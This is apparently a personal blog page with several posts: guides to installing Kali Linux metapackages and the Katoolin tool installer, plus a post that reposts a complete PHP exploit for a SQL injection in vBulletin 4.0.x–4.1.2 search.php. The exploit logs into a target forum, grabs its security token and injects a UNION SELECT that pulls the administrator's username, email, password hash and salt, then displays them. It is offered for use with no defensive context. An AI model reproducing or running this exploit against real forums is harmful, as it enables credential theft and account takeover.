29 Ekim 2017 Pazar

Install packages you want in kali linux light

Install packages you want in kali linux light
If you have downloaded Kali Linux 32 bit mini, Kali Linux 64 bit mini, Kali Linux 32 bit Light, Kali Linux 64 bit Light, then you might find that some tools are missing and only some basic tools are available such as nmap, Aircrack-ng.

Kali Linux provide multiple metapackages that would allow us to easily install subsets of tools based on our particular needs. After installation of kali linux mini or light version here is what you want to do first. Below is the way to install the package you want.

1. Make sure you have correct repo. for more info go to http://docs.kali.org/general-use/kali-linux-sources-list-repositories

 a. Always take a backup
 # mv /etc/apt/sources.list /etc/apt/sources.list_BAK

 b. Create a repo source file
# vi /etc/apt/sources.list

 c. Paste following 
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

# sudo apt-get update

d. search available metapackages 
# apt-cache search kali-linux



you can play around with apt-cache
# apt-cache -h
# apt-cache showpkg kali-linux  

e. If you want kali-linux-web package then install with below command
# apt-get install kali-linux-web

Find out list of tools inside each packages: http://tools.kali.org/kali-metapackages

What if you just want a tool. For example, if there is no arpspoof by default and 
you want to install it

# apt-cache search arpspoof



# apt-get install dsniff

There you go :)
N5K5İ5 at Hiç yorum yok:
n5k5i5 , , , , , , ,
Location: Turkey

How to Auto Install All Kali Linux Tools Using “Katoolin” on Debian/Ubuntu

Katoolin is a script that helps to install Kali Linux tools on your Linux distribution of choice. For those of us who like to use penetration testing tools provided by Kali Linux development team can effectively do that on their preferred Linux distribution by using Katoolin.
Katoolin - Install Kali Linux Tools
Katoolin – Install Kali Linux Tools
In this tutorial we are going to look at steps to install Katoolin on Debian based derivatives.

Major Features of Katoolin

  1. Adding Kali Linux repositories.
  2. Removing Kali Linux repositories.
  3. Installing Kali Linux tools.

Requirements

Requirements for installing and using Katoolin.
  1. An operating system for this case we are using Ubuntu 14.04 64-bit.
  2. Python 2.7

Installing Katoolin

To install Katoolin run the following commands.
# apt-get install git
# git clone https://github.com/LionSec/katoolin.git  && cp katoolin/katoolin.py /usr/bin/katoolin
Sample Output
cp katoolin/katoolin.py /usr/bin/katoolin
Cloning into 'katoolin'...
remote: Counting objects: 52, done.
remote: Total 52 (delta 0), reused 0 (delta 0), pack-reused 52
Unpacking objects: 100% (52/52), done.
Checking connectivity... done.
Then make /usr/bin/katoolin executable by running the command below.
# chmod +x  /usr/bin/katoolin
Now you can run Katoolin as follows.
# katoolin
The output below shows the interface of Katoolin when you run the command.
Sample Output
 $$\   $$\             $$\                         $$\ $$\           
$$ | $$  |            $$ |                        $$ |\__|          
$$ |$$  /  $$$$$$\  $$$$$$\    $$$$$$\   $$$$$$\  $$ |$$\ $$$$$$$\  
$$$$$  /   \____$$\ \_$$  _|  $$  __$$\ $$  __$$\ $$ |$$ |$$  __$$\ 
$$  $$<    $$$$$$$ |  Kali linux tools installer |$$ |$$ |$$ |  $$ |
$$ |\$$\  $$  __$$ |  $$ |$$\ $$ |  $$ |$$ |  $$ |$$ |$$ |$$ |  $$ |
$$ | \$$\ \$$$$$$$ |  \$$$$  |\$$$$$$  |\$$$$$$  |$$ |$$ |$$ |  $$ |
\__|  \__| \_______|   \____/  \______/  \______/ \__|\__|\__|  \__| V1.0 
+ -- -- +=[ Author: LionSec | Homepage: www.lionsec.net
+ -- -- +=[ 330 Tools 
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
As you can see it provides a menu from which you can make selections of what you want to do.
Incase the above way of installation fails, you also can try the following steps.
Go to https://github.com/LionSec/katoolin.git page download the zip file and extract it.
# wget https://github.com/LionSec/katoolin/archive/master.zip
# unzip master.zip
After extracting, you should be able to find katoolin.py script. Run katoolin.py command, you will be able to view the output similar to above.
# cd katoolin-master/
# chmod 755 katoolin.py
#  ./katoolin.py

How do I use Katoolin?

To add Kali Linux repositories and update repositories, select option 1 from the Menu.
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1
Sample Output
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.DC9QzwECdM --no-auto-check-trustdb --trust-model always --keyring /etc/apt/trusted.gpg --primary-keyring /etc/apt/trusted.gpg --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server pgp.mit.edu
gpg: key 7D8D0BF6: public key "Kali Linux Repository <devel@kali.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
Then you can select option 2 from the interface above to update the repositories. From the output below, I have only captured a portion where Kali Linux repositories are being updated so that one can install Kali Linux tools in Ubuntu.
What do you want to do ?> 2
Ign http://in.archive.ubuntu.com vivid InRelease                                                                                            
Ign http://security.ubuntu.com vivid-security InRelease                                                                                                               
Ign http://in.archive.ubuntu.com vivid-updates InRelease                                                                                                               
Get:1 http://security.ubuntu.com vivid-security Release.gpg [933B]                                                                                                    
Ign http://in.archive.ubuntu.com vivid-backports InRelease                                                                                                                      
Get:2 http://repo.kali.org kali-bleeding-edge InRelease [11.9 kB]                                                                              
Get:3 http://security.ubuntu.com vivid-security Release [63.5 kB]                                                            
Hit http://in.archive.ubuntu.com vivid Release.gpg                                                                              
Get:4 http://repo.kali.org kali-bleeding-edge/main amd64 Packages [8,164 B]                                                
Get:5 http://in.archive.ubuntu.com vivid-updates Release.gpg [933 B]                                                                
Get:6 http://repo.kali.org kali-bleeding-edge/main i386 Packages [8,162 B]                                               
Hit http://in.archive.ubuntu.com vivid-backports Release.gpg    
...
If you want to delete the Kali Linux repositories you added, then select option 3.
What do you want to do ?> 3
All kali linux repositories have been deleted !
As part of its operation, the Apt package uses a /etc/apt/sources.list that lists the ‘sources‘ from which you can obtain and install other packages.
To view contents of /etc/apt/sources.list file, select of 4.
What do you want to do ?> 4
#deb cdrom:[Ubuntu 15.04 _Vivid Vervet_ - Release amd64 (20150422)]/ vivid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
deb-src http://in.archive.ubuntu.com/ubuntu/ vivid-updates main restricted
...
To go back you can simply type back and press [Enter] key.
What do you want to do ?> back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
To go back to the main menu, simply type gohome and press [Enter] key.
kat > gohome
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat >
There are different categories of Kali Linux tools you can install on your Ubuntu using Katoolin.
To view the available categories, select option 2 from the main menu.
kat > 2
**************************** All Categories *****************************
1) Information Gathering   8) Exploitation Tools
2) Vulnerability Analysis   9) Forensics Tools
3) Wireless Attacks    10) Stress Testing
4) Web Applications    11) Password Attacks
5) Sniffing & Spoofing    12) Reverse Engineering
6) Maintaining Access    13) Hardware Hacking
7) Reporting Tools     14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
You can select a category of choice or install all available Kali Linux tools by selecting option (0) and press [Enter] to install.
You can also install a ClassicMenu indicator using Katoolin.
    1. ClassicMenu Indicator is a application indicator for the top panel of Ubuntu’s Unity desktop environment.
    2. ClassicMenu Indicator provides a simple way for you to get a classic GNOME-style application menu for those who prefer this over the default Unity dash menu.
For more information, please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
To install classicmenu indicator, press y and press [Enter].
kat > back
1) Add Kali repositories & Update 
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
ClassicMenu Indicator is a notification area applet (application indicator) for the top panel of Ubuntu's Unity desktop environment.
It provides a simple way to get a classic GNOME-style application menu for those who prefer this over the Unity dash menu.
Like the classic GNOME menu, it includes Wine games and applications if you have those installed.
For more information , please visit : http://www.florian-diesch.de/software/classicmenu-indicator/
Do you want to install classicmenu indicator ? [y/n]> y
This PPA contains the most recent alpha/beta releases for
 * Arronax http://www.florian-diesch.de/software/arronax/
 * ClassicMenu Indicator http://www.florian-diesch.de/software/classicmenu-indicator/
* Privacy Indicator http://www.florian-diesch.de/software/indicator-privacy/
 * RunLens http://www.florian-diesch.de/software/runlens/
 * Unsettings http://www.florian-diesch.de/software/unsettings/
 * UUdeLens http://www.florian-diesch.de/software/uudelens
More info: https://launchpad.net/~diesch/+archive/ubuntu/testing
Press [ENTER] to continue or ctrl-c to cancel adding it
gpg: keyring `/tmp/tmpaqk6fphl/secring.gpg' created
gpg: keyring `/tmp/tmpaqk6fphl/pubring.gpg' created
...
You can also install Kali menu in Ubuntu by select option 4 and press y and then press [Enter].
To quit Katoolin, simply press Control+C.
kat > ^CShutdown requested...Goodbye...
N5K5İ5 at Hiç yorum yok:
n5k5i5

11 Eylül 2017 Pazartesi

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

                      888               888    888              
                      888               888    888              
                      888               888    888              
 .d8888b .d88b.   .d88888  .d88b.   .d88888    88888b.  888  888
d88P"   d88""88b d88" 888 d8P  Y8b d88" 888    888 "88b 888  888
888     888  888 888  888 88888888 888  888    888  888 888  888
Y88b.   Y88..88P Y88b 888 Y8b.     Y88b 888    888 d88P Y88b 888
 "Y8888P "Y88P"   "Y88888  "Y8888   "Y88888    88888P"   "Y88888
                                                             888
                                                        Y8b d88P
                                                         "Y88P"

8888888b.         d8888 888888b.    .d8888b.   .d88888b.  888     888 888b    888
888   Y88b       d88888 888  "88b  d88P  Y88b d88P" "Y88b 888     888 8888b   888
888    888      d88P888 888  .88P       .d88P 888     888 888     888 88888b  888
888   d88P     d88P 888 8888888K.      8888"  888     888 888     888 888Y88b 888
8888888P"     d88P  888 888  "Y88b      "Y8b. 888     888 888     888 888 Y88b888
888 T88b     d88P   888 888    888 888    888 888     888 888     888 888  Y88888
888  T88b   d8888888888 888   d88P Y88b  d88P Y88b. .d88P Y88b. .d88P 888   Y8888
888   T88b d88P     888 8888888P"   "Y8888P"   "Y88888P"   "Y88888P"  888    Y888


mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>

<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text'  size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>

<?
 if($_POST['form_action'] == 1 )
 {
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];

$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
       $md5Pass = md5($pass);
       $data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";

       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   // curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
 
 
 
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');


       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);



$url2= trim(myf($store,"Location:","Content-Length:"));

       $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$url2);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
   curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");

//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)

{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>
N5K5İ5 at Hiç yorum yok:

8 Ağustos 2017 Salı

torrent-tracker listesi

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.
N5K5İ5 at Hiç yorum yok:
n5k5i5 , , , , , , , , , , ,

11 Mayıs 2017 Perşembe

Debian sunucu güvenliğini


N5K5İ5 at Hiç yorum yok:
n5k5i5 , , , , , , ,
Kaydol: Kayıtlar (Atom)